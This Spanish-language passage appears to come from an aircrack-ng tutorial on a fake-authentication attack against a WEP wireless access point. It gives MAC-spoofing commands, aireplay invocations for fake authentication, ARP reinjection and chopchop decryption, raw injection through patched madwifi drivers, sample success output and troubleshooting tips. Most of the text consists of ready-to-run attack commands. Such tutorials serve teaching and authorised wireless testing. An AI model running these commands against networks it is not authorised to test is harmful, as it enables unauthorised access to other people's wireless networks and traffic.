Ataque 1: autenticación falsa
Este ataque es particularmente útil cuando no hay clientes asociados: creamos la dirección MAC de un cliente falso, la cual quedará registrada en la tabla de asociación del AP. Esta dirección será usada para los ataques 3 (reinyección de peticiones ARP) y 4 (desencriptación WEP "chopchop"). Es mejor preparar la tarjeta con la MAC usada (abajo, 00:11:22:33:44:55) de modo que el controlador envíe ACKs de forma adecuada.

De todos modos si este ataque falla y hay ya un cliente asociado, es más efectivo usar simplemente su dirección MAC (aquí, 00:09:5B:EB:C5:2B) para los ataques 3 y 4.


ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

aireplay -1 0 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)

Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en modo Infraestructura (la clave WEP en sí misma no importa, en tanto que el AP acepte autenticación abierta). Por lo que, en lugar de usar el ataque 1, puedes sólo asociarte e inyectar / monitorizar a través de la interfaz athXraw:

ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid "el ssid" key AAAAAAAAAA
ifconfig ath0 up

sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump ath0raw out 6
Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazará automáticamente ath0 por ath0raw):


aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0
 

Algunos puntos de acceso requieren de reautenticación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:


aireplay -1 30 -e "el ssid" -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Si este ataque parece fallar (aireplay permanece enviando paquetes de petición de autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate también de que:


Estás lo suficientemente cerca del punto de acceso.
El controlador está correctamente parcheado e instalado.
La tarjeta está configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, asegúrate de que el firmware está actualizado.
Como recordatorio: no puedes inyectar con un chipset Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell o Broadcom debido a limitaciones de firmware y/o controlador